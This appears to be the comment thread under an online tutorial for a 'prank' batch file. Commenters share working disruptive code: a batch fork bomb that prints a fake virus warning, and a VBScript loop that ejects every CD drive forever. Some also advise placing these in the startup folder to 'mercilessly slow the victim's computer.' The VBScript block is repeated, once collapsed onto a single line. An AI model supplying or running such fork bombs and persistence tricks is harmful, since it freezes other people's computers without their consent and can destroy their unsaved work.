Open the CD drive over, and over, and over forever.
do Dim ts Dim strDriveLetter Dim intDriveLetter Dim fs 'As Scripting.FileSystemObject Const CDROM = 4 On Error Resume Next Set fs = CreateObject("Scripting.FileSystemObject") strDriveLetter = "" For intDriveLetter = Asc("A") To Asc("Z") Err.Clear If fs.GetDrive(Chr(intDriveLetter)).DriveType = CDROM Then If Err.Number = 0 Then strDriveLetter = Chr(intDriveLetter) Exit For End If End If Next Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection For d = 0 to colCDROMs.Count - 1 colCDROMs.Item(d).Eject Next 'null
For d = 0 to colCDROMs.Count - 1 colCDROMs.Item(d).Eject Next 'null
This is amazing! I searched about 20, and this was the best. Simple and effective, this gets MY thumbs-up.
But... if anything, what happens if you DO "press any key"? Does something actually HAPPEN?
so it's a fork bomb and a fake virus?
2 hits!
however, if you wanted to not do the slow part, you could write something to close the bat as the second one opens.
Well, the actual purpose of this .bat file is mainly to mercilessly slow the victim's computer, and the command to close the command prompt is "EXIT," so instead of typing "GOTO START," type "EXIT." This will close the command prompt after each restart, unfortunately, not slowing your victim's computer, and losing its effectiveness. Hope you found this information helpful!
(quote1) --> "Harmless in every way." (quote2) --> "GOTO START : This tells the computer to run the file over and over and over again without stopping which causes the computer to freeze since it gets opened so much."
OMFG Freezing your parents computer is soooooo harmless :P
50 Comments
10 years ago on Introduction
is there any way to abort the process once it has started
Reply 4 years ago
as this comment is from a few years ago i expect you wont read this but "pause break" will stop any batch file so it stops doing things
Reply 7 years ago
mhhh you have to open task menager and shut down the prozess ........ But if you just didtn write the "goto start " you can just close it
Reply 8 years ago on Introduction
i know you commented a while ago but yes. if you simply close the command window
5 years ago
Amazing!!me and a friend have been looking at these codes and we have made a code that laggs and opens the cd drive!
5 years ago
you should add timeouts and an auto restart
6 years ago
Actually using loop with loads of starts ok too
6 years ago
If you want to harm their computer...
@echo off
echo The Virus Has Been Downloaded
ping localhost -n 5 >nul
cls
echo It can't be stopped!
ping localhost -n 2 >nul
:loop
start
goto loop
============================================================
This command will open google forever.
============================================================
Or...
@echo off
:loop
start
goto loop
============================================================
Is a simpler version of the top one.
============================================================
Open the CD drive over, and over, and over forever.
do
Dim ts
Dim strDriveLetter
Dim intDriveLetter
Dim fs 'As Scripting.FileSystemObject
Const CDROM = 4
On Error Resume Next
Set fs = CreateObject("Scripting.FileSystemObject")
strDriveLetter = ""
For intDriveLetter = Asc("A") To Asc("Z")
Err.Clear
If fs.GetDrive(Chr(intDriveLetter)).DriveType = CDROM Then
If Err.Number = 0 Then
strDriveLetter = Chr(intDriveLetter)
Exit For
End If
End If
Next
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
For d = 0 to colCDROMs.Count - 1
colCDROMs.Item(d).Eject
Next 'null
For d = 0 to colCDROMs.Count - 1
colCDROMs.Item(d).Eject
Next 'null
set owmp = nothing
set colCDROMs = nothing
loop
6 years ago
And antivirus programs detect it as a potentially harmful program!
6 years ago
Put this in startup folder and your computer will be really screwed up.
6 years ago
aww yeah!
6 years ago on Introduction
Awwwww nice best prank evr
:3
13 years ago on Step 3
This is amazing! I searched about 20, and this was the best. Simple and effective, this gets MY thumbs-up. But... if anything, what happens if you DO "press any key"? Does something actually HAPPEN?
Reply 7 years ago on Step 3
Because there is no code after it it will just close and stop the cmmands.
Reply 7 years ago on Introduction
If you press a key it will re-open itself over and over again until it causes your computer to crash with lag. Have fun!
Reply 7 years ago
yeah it starts his selfe again and again and again so you cant close it
Reply 11 years ago on Introduction
nothing happens thats just a message
14 years ago on Step 1
so it's a fork bomb and a fake virus? 2 hits! however, if you wanted to not do the slow part, you could write something to close the bat as the second one opens.
Reply 7 years ago on Introduction
Well, the actual purpose of this .bat file is mainly to mercilessly slow the victim's computer, and the command to close the command prompt is "EXIT," so instead of typing "GOTO START," type "EXIT." This will close the command prompt after each restart, unfortunately, not slowing your victim's computer, and losing its effectiveness. Hope you found this information helpful!
9 years ago on Introduction
(quote1) --> "Harmless in every way."
(quote2) --> "GOTO START : This tells the computer to run the file over and over and over again without stopping which causes the computer to freeze since it gets opened so much."
OMFG Freezing your parents computer is soooooo harmless :P